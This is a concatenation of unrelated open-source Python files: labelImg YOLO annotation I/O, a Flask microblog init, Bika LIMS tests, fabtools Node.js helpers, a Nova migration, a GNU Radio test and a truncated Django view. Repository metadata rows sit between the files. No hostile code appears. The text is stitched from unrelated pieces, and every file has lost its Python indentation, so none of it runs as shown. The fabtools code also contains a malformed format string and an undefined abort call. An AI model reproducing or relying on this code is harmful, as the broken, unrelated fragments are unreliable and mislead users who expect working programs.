# -*- coding: utf8 -*-
import sys
import os
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from lxml import etree
import codecs
from libs.constants import DEFAULT_ENCODING
TXT_EXT = '.txt'
ENCODE_METHOD = DEFAULT_ENCODING
class YOLOWriter:
def __init__(self, folder_name, filename, img_size, database_src='Unknown', local_img_path=None):
self.folder_name = folder_name
self.filename = filename
self.database_src = database_src
self.img_size = img_size
self.box_list = []
self.local_img_path = local_img_path
self.verified = False
def add_bnd_box(self, x_min, y_min, x_max, y_max, name, difficult):
bnd_box = {'xmin': x_min, 'ymin': y_min, 'xmax': x_max, 'ymax': y_max}
bnd_box['name'] = name
bnd_box['difficult'] = difficult
self.box_list.append(bnd_box)
def bnd_box_to_yolo_line(self, box, class_list=[]):
x_min = box['xmin']
x_max = box['xmax']
y_min = box['ymin']
y_max = box['ymax']
x_center = float((x_min + x_max)) / 2 / self.img_size[1]
y_center = float((y_min + y_max)) / 2 / self.img_size[0]
w = float((x_max - x_min)) / self.img_size[1]
h = float((y_max - y_min)) / self.img_size[0]
# PR387
box_name = box['name']
if box_name not in class_list:
class_list.append(box_name)
class_index = class_list.index(box_name)
return class_index, x_center, y_center, w, h
def save(self, class_list=[], target_file=None):
out_file = None # Update yolo .txt
out_class_file = None # Update class list .txt
if target_file is None:
out_file = open(
self.filename + TXT_EXT, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(self.filename)), "classes.txt")
out_class_file = open(classes_file, 'w')
else:
out_file = codecs.open(target_file, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(target_file)), "classes.txt")
out_class_file = open(classes_file, 'w')
for box in self.box_list:
class_index, x_center, y_center, w, h = self.bnd_box_to_yolo_line(box, class_list)
# print (classIndex, x_center, y_center, w, h)
out_file.write("%d %.6f %.6f %.6f %.6f\n" % (class_index, x_center, y_center, w, h))
# print (classList)
# print (out_class_file)
for c in class_list:
out_class_file.write(c+'\n')
out_class_file.close()
out_file.close()
class YoloReader:
def __init__(self, file_path, image, class_list_path=None):
# shapes type:
# [labbel, [(x1,y1), (x2,y2), (x3,y3), (x4,y4)], color, color, difficult]
self.shapes = []
self.file_path = file_path
if class_list_path is None:
dir_path = os.path.dirname(os.path.realpath(self.file_path))
self.class_list_path = os.path.join(dir_path, "classes.txt")
else:
self.class_list_path = class_list_path
# print (file_path, self.class_list_path)
classes_file = open(self.class_list_path, 'r')
self.classes = classes_file.read().strip('\n').split('\n')
# print (self.classes)
img_size = [image.height(), image.width(),
1 if image.isGrayscale() else 3]
self.img_size = img_size
self.verified = False
# try:
self.parse_yolo_format()
# except:
# pass
def get_shapes(self):
return self.shapes
def add_shape(self, label, x_min, y_min, x_max, y_max, difficult):
points = [(x_min, y_min), (x_max, y_min), (x_max, y_max), (x_min, y_max)]
self.shapes.append((label, points, None, None, difficult))
def yolo_line_to_shape(self, class_index, x_center, y_center, w, h):
label = self.classes[int(class_index)]
x_min = max(float(x_center) - float(w) / 2, 0)
x_max = min(float(x_center) + float(w) / 2, 1)
y_min = max(float(y_center) - float(h) / 2, 0)
y_max = min(float(y_center) + float(h) / 2, 1)
x_min = round(self.img_size[1] * x_min)
x_max = round(self.img_size[1] * x_max)
y_min = round(self.img_size[0] * y_min)
y_max = round(self.img_size[0] * y_max)
return label, x_min, y_min, x_max, y_max
def parse_yolo_format(self):
bnd_box_file = open(self.file_path, 'r')
for bndBox in bnd_box_file:
class_index, x_center, y_center, w, h = bndBox.strip().split(' ')
label, x_min, y_min, x_max, y_max = self.yolo_line_to_shape(class_index, x_center, y_center, w, h)
# Caveat: difficult flag is discarded when saved as yolo format.
self.add_shape(label, x_min, y_min, x_max, y_max, False)
| mit | 1,057,282,036,230,914,300 | 33.232877 | 110 | 0.566026 | false | 3.040146 | false | false | false |
tongxindao/Flask-micblog | Flask-MicroBlog/web/micblog/app/__init__.py | 1 | 1602 | # coding: utf-8
import os
from flask_login import LoginManager
from flask_openid import OpenID
from config import basedir, ADMINS, MAIL_SERVER, MAIL_PORT, MAIL_USERNAME, MAIL_PASSWORD
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from momentjs import momentjs
from flask_babel import Babel, lazy_gettext
from flask.json import JSONEncoder
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
lm.login_view = 'login'
lm.login_message = lazy_gettext('请您先登陆。')
oid = OpenID(app, os.path.join(basedir, 'tmp'))
mail = Mail(app)
babel = Babel(app)
if not app.debug:
import logging
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler('tmp/microblog.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('microblog startup')
app.jinja_env.globals['momentjs'] = momentjs
babel = Babel(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
from speaklater import is_lazy_string
if is_lazy_string(obj):
try:
return unicode(obj) # python 2
except NameError:
return str(obj) # python 3
return super(CustomJSONEncoder, self).default(obj)
app.json_encoder = CustomJSONEncoder
from app import views, models
| apache-2.0 | 6,041,693,416,205,161,000 | 25.949153 | 119 | 0.709434 | false | 3.449024 | false | false | false |
veroc/Bika-LIMS | bika/lims/tests/test_hiddenanalyses.py | 2 | 17336 | from bika.lims.content.analysis import Analysis
from bika.lims.testing import BIKA_FUNCTIONAL_TESTING
from bika.lims.tests.base import BikaFunctionalTestCase
from bika.lims.utils.analysisrequest import create_analysisrequest
from bika.lims.workflow import doActionFor
from plone.app.testing import login, logout
from plone.app.testing import TEST_USER_NAME
import unittest
try:
import unittest2 as unittest
except ImportError: # Python 2.7
import unittest
class TestHiddenAnalyses(BikaFunctionalTestCase):
layer = BIKA_FUNCTIONAL_TESTING
def setUp(self):
super(TestHiddenAnalyses, self).setUp()
login(self.portal, TEST_USER_NAME)
servs = self.portal.bika_setup.bika_analysisservices
# analysis-service-3: Calcium (Ca)
# analysis-service-6: Cooper (Cu)
# analysis-service-7: Iron (Fe)
self.services = [servs['analysisservice-3'],
servs['analysisservice-6'],
servs['analysisservice-7']]
# Calcium - Hidden not set
# Copper - Hidden set to False
self.services[1].setHidden(False)
# Iron - Hidden set to True
self.services[2].setHidden(True)
profs = self.portal.bika_setup.bika_analysisprofiles
# analysisprofile-1: Trace Metals
self.analysisprofile = profs['analysisprofile-1']
artemp = self.portal.bika_setup.bika_artemplates
# artemplate-2: Bruma Metals
self.artemplate = artemp['artemplate-2']
def tearDown(self):
# Restore
for s in self.services:
s.setHidden(False)
self.analysisprofile.setAnalysisServicesSettings([])
self.artemplate.setAnalysisServicesSettings([])
logout()
super(TestHiddenAnalyses, self).tearDown()
def test_service_hidden_service(self):
service = self.services[1]
uid = service.UID()
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(False)
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(True)
self.assertTrue(service.getHidden())
self.assertTrue(service.Schema().getField('Hidden').get(service))
# Restore
service.setHidden(False)
def test_service_hidden_profile(self):
# Profile
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in profile
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Cooper in profile
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in profile
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
def test_service_hidden_artemplate(self):
# Template
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in template
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Cooper in template
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in template
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_service_hidden_analysisrequest(self):
# Input results
# Client: Happy Hills
# SampleType: Apple Pulp
# Contact: Rita Mohale
# Analyses: [Calcium, Copper, Iron]
client = self.portal.clients['client-1']
sampletype = self.portal.bika_setup.bika_sampletypes['sampletype-1']
request = {}
services = [s.UID() for s in self.services]
values = {'Client': client.UID(),
'Contact': client.getContacts()[0].UID(),
'SamplingDate': '2015-01-01',
'SampleType': sampletype.UID()}
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.isAnalysisServiceHidden(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.isAnalysisServiceHidden(services[1]))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
self.assertTrue(ar.isAnalysisServiceHidden(services[2]))
# For Calcium (unset)
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in AR
uid = self.services[0].UID();
sets = [{'uid': uid}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
ar.setAnalysisServicesSettings(sets)
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
ar.setAnalysisServicesSettings([])
# AR with profile with no changes
values['Profiles'] = self.analysisprofile.UID()
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with template with no changes
values['Template'] = self.artemplate
del values['Profiles']
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with profile, with changes
values['Profiles'] = self.analysisprofile.UID()
del values['Template']
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.analysisprofile.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
# AR with template, with changes
values['Template'] = self.artemplate.UID()
del values['Profiles']
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.artemplate.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
# testing tests
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestHiddenAnalyses))
suite.layer = BIKA_FUNCTIONAL_TESTING
return suite
| agpl-3.0 | 6,423,463,675,719,172,000 | 45.602151 | 92 | 0.65338 | false | 4.186428 | true | false | false |
hagai26/fabtools | fabtools/nodejs.py | 1 | 5616 | """
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note: the ``simplejson`` module is required on Python 2.5
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
try:
import json
except ImportError:
import simplejson as json
from fabric.api import cd, hide, run, settings
from fabtools.system import cpus, distrib_family
from fabtools.utils import run_as_root
DEFAULT_VERSION = '0.10.13'
def install_from_source(version=DEFAULT_VERSION, checkinstall=False, dist_num=None):
"""
Install Node JS from source.
If *checkinstall* is ``True``, a distribution package will be built.
set dist_num to set make -j value
::
import fabtools
# Install Node.js
fabtools.nodejs.install_nodejs()
.. note:: This function may not work for old versions of Node.js.
"""
from fabtools.require.deb import packages as require_deb_packages
from fabtools.require.rpm import packages as require_rpm_packages
from fabtools.require import file as require_file
family = distrib_family()
if family == 'debian':
packages = [
'build-essential',
'libssl-dev',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_deb_packages(packages)
elif family == 'redhat':
packages = [
'gcc',
'gcc-c++',
'make',
'openssl-devel',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_rpm_packages(packages)
filename = 'node-v%s.tar.gz' % version
foldername = filename[0:-7]
require_file(url='http://nodejs.org/dist/v%(version)s/%(filename)s' % {
'version': version,
'filename': filename,
})
run('tar -xzf %s' % filename)
cpus_num = None
if dist_num:
if dist_num > 0:
cpus_num = dist_num
else:
abort("dist_num should be positive")
else:
cpus_num = cpus() + 1
if cpus_num:
with cd(foldername):
run('./configure')
run('make -j%d' % cpus_num)
if checkinstall:
run_as_root('checkinstall -y --pkgname=nodejs --pkgversion=%(version) '
'--showinstall=no make install' % locals())
else:
run_as_root('make install')
run('rm -rf %(filename)s %(foldername)s' % locals())
def version(node='node'):
"""
Get the version of Node.js currently installed.
Returns ``None`` if it is not installed.
"""
with settings(hide('running', 'stdout', 'warnings'), warn_only=True):
res = run('%(node)s --version' % locals())
if res.failed:
return None
else:
return res[1:]
def install_package(package, version=None, local=False, npm='npm'):
"""
Install a Node.js package.
If *local* is ``True``, the package will be installed locally.
::
import fabtools
# Install package globally
fabtools.nodejs.install_package('express')
# Install package locally
fabtools.nodejs.install_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s install -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s install -g %(package)s' % locals())
def install_dependencies(npm='npm'):
"""
Install Node.js package dependencies.
This function calls ``npm install``, which will locally install all
packages specified as dependencies in the ``package.json`` file
found in the current directory.
::
from fabric.api import cd
from fabtools import nodejs
with cd('/path/to/nodejsapp/'):
nodejs.install_dependencies()
"""
run('%(npm)s install' % locals())
def package_version(package, local=False, npm='npm'):
"""
Get the installed version of a Node.js package.
Returns ``None``is the package is not installed. If *local* is
``True``, returns the version of the locally installed package.
"""
options = ['--json true', '--silent']
if local:
options.append('-l')
else:
options.append('-g')
options = ' '.join(options)
with hide('running', 'stdout'):
res = run('%(npm)s list %(options)s' % locals())
dependencies = json.loads(res).get('dependencies', {})
pkg_data = dependencies.get(package)
if pkg_data:
return pkg_data['version']
else:
return None
def update_package(package, local=False, npm='npm'):
"""
Update a Node.js package.
If *local* is ``True``, the package will be updated locally.
"""
if local:
run('%(npm)s update -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s update -g %(package)s' % locals())
def uninstall_package(package, version=None, local=False, npm='npm'):
"""
Uninstall a Node.js package.
If *local* is ``True``, the package will be uninstalled locally.
::
import fabtools
# Uninstall package globally
fabtools.nodejs.uninstall_package('express')
# Uninstall package locally
fabtools.nodejs.uninstall_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s uninstall -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s uninstall -g %(package)s' % locals())
| bsd-2-clause | 8,728,828,897,423,888,000 | 24.071429 | 87 | 0.585292 | false | 3.862448 | false | false | false |
plumgrid/plumgrid-nova | nova/db/sqlalchemy/migrate_repo/versions/147_no_service_zones.py | 10 | 4133 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregates = Table('aggregates', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
# migrate data
record_list = list(services.select().execute())
for rec in record_list:
# Only need to migrate nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
# if zone doesn't exist create
result = aggregate_metadata.select().where(
aggregate_metadata.c.key == 'availability_zone').where(
aggregate_metadata.c.value == rec['availability_zone']).execute()
result = [r for r in result]
if len(result) > 0:
agg_id = result[0].aggregate_id
else:
agg = aggregates.insert()
result = agg.execute({'name': rec['availability_zone']})
agg_id = result.inserted_primary_key[0]
row = aggregate_metadata.insert()
row.execute({'created_at': rec['created_at'],
'updated_at': rec['updated_at'],
'deleted_at': rec['deleted_at'],
'deleted': rec['deleted'],
'key': 'availability_zone',
'value': rec['availability_zone'],
'aggregate_id': agg_id,
})
# add host to zone
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
num_hosts = agg_hosts.count().where(
agg_hosts.c.host == rec['host']).where(
agg_hosts.c.aggregate_id == agg_id).execute().scalar()
if num_hosts == 0:
agg_hosts.insert().execute({'host': rec['host'],
'aggregate_id': agg_id})
services.drop_column('availability_zone')
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
availability_zone = Column('availability_zone', String(255),
default='nova')
services.create_column(availability_zone)
# Migrate data back
# NOTE(jhesketh): This needs to be done with individual inserts as multiple
# results in an update sub-query do not work with MySQL. See bug/1207309.
record_list = list(services.select().execute())
for rec in record_list:
# Only need to update nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
result = select([aggregate_metadata.c.value],
from_obj=aggregate_metadata.join(
agg_hosts,
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
)
).where(
aggregate_metadata.c.key == 'availability_zone'
).where(
agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id
).where(
agg_hosts.c.host == rec['host']
)
services.update().values(
availability_zone=list(result.execute())[0][0]
).where(
services.c.id == rec['id']
)
| apache-2.0 | -5,195,159,218,413,275,000 | 39.126214 | 79 | 0.598355 | false | 4.260825 | false | false | false |
smunaut/gnuradio | gr-analog/python/analog/qa_probe_avg_mag_sqrd.py | 57 | 3007 | #!/usr/bin/env python
#
# Copyright 2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import math
from gnuradio import gr, gr_unittest, analog, blocks
def avg_mag_sqrd_c(x, alpha):
y = [0,]
for xi in x:
tmp = alpha*(xi.real*xi.real + xi.imag*xi.imag) + (1-alpha)*y[-1]
y.append(tmp)
return y
def avg_mag_sqrd_f(x, alpha):
y = [0,]
for xi in x:
tmp = alpha*(xi*xi) + (1-alpha)*y[-1]
y.append(tmp)
return y
class test_probe_avg_mag_sqrd(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_c_001(self):
alpha = 0.0001
src_data = [1.0+1.0j, 2.0+2.0j, 3.0+3.0j, 4.0+4.0j, 5.0+5.0j,
6.0+6.0j, 7.0+7.0j, 8.0+8.0j, 9.0+9.0j, 10.0+10.0j]
expected_result = avg_mag_sqrd_c(src_data, alpha)[-1]
src = blocks.vector_source_c(src_data)
op = analog.probe_avg_mag_sqrd_c(0, alpha)
self.tb.connect(src, op)
self.tb.run()
result_data = op.level()
self.assertAlmostEqual(expected_result, result_data, 5)
def test_cf_002(self):
alpha = 0.0001
src_data = [1.0+1.0j, 2.0+2.0j, 3.0+3.0j, 4.0+4.0j, 5.0+5.0j,
6.0+6.0j, 7.0+7.0j, 8.0+8.0j, 9.0+9.0j, 10.0+10.0j]
expected_result = avg_mag_sqrd_c(src_data, alpha)[0:-1]
src = blocks.vector_source_c(src_data)
op = analog.probe_avg_mag_sqrd_cf(0, alpha)
dst = blocks.vector_sink_f()
self.tb.connect(src, op)
self.tb.connect(op, dst)
self.tb.run()
result_data = dst.data()
self.assertComplexTuplesAlmostEqual(expected_result, result_data, 5)
def test_f_003(self):
alpha = 0.0001
src_data = [1.0, 2.0, 3.0, 4.0, 5.0,
6.0, 7.0, 8.0, 9.0, 10.0]
expected_result = avg_mag_sqrd_f(src_data, alpha)[-1]
src = blocks.vector_source_f(src_data)
op = analog.probe_avg_mag_sqrd_f(0, alpha)
self.tb.connect(src, op)
self.tb.run()
result_data = op.level()
self.assertAlmostEqual(expected_result, result_data, 5)
if __name__ == '__main__':
gr_unittest.run(test_probe_avg_mag_sqrd, "test_probe_avg_mag_sqrd.xml")
| gpl-3.0 | 2,704,701,076,577,412,000 | 29.683673 | 76 | 0.602261 | false | 2.855651 | true | false | false |
unicefuganda/mics | survey/views/users.py | 1 | 4896 | import json
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.contrib import messages
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required, permission_required
from survey.investigator_configs import *
from survey.forms.users import *
from survey.models.users import UserProfile
from survey.views.custom_decorators import permission_required_for_perm_or_current_user
def _add_error_messages(userform, request, action_str='registered'):
error_message = "User not %s. "%action_str
messages.error(request, error_message + "See errors below.")
def _process_form(userform, request, action_success="registered", redirect_url="/users/new/"):
